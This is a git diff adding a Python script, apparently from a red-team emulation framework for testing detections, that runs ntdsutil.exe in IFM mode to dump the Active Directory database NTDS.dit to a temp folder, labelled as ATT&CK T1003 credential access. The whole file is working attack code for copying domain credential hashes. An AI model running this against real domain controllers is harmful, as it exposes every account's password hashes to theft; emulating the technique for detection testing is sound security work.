diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
new file mode 100644
index 0000000..9a3099b
--- /dev/null
+++ b/red_ttp/ntdsutil_dump_ad.py
@@ -0,0 +1,47 @@
+# Name: Dump Active Directory Database with NTDSUTIL
+# rta: ntdsutil_dump_ad.py
+# ATT&CK: T1003
+# Description: Dumps the Active Directory database, ntds.dit, to disk for offline credential access attacks.
+
+import os
+import common
+import errno
+
+NTDSUTIL = "ntdsutil.exe"
+ACTIVATE = "activate instance ntds"
+IFM = "IFM"
+DUMPDIR = "C:\Windows\Temp\RTA"
+CREATE = "create full " + DUMPDIR
+NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"
+
+
+def main():
+
+    common.log("Ensuring dump folder exists...")
+    if os.path.exists(DUMPDIR):
+        common.log("Dump folder already exists, moving on!")
+    else:
+        common.log("Dump folder doesn't exist, creating...")
+        try:
+            os.makedirs(DUMPDIR)
+        except OSError as e:
+            if e.errno != errno.EEXIST:
+                common.log("Failed to create dump folder!")
+                raise
+
+
+    common.log("Executing ntdsutil.exe...")
+    code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"])
+
+    if code == 0:
+        common.log("Successfully executed ntdsutil.exe!")
+    else:
+        common.log("Did not successfully execute ntdsutil.exe.")
+    if os.path.exists(NTDSDIT_FILE):
+        common.log("Successfully dumped Active Directory to " + NTDSDIT_FILE)
+    else:
+        common.log("Did not successfully create NTDS.dit file.")
+
+
+if __name__ == "__main__":
+    exit(main())
\ No newline at end of file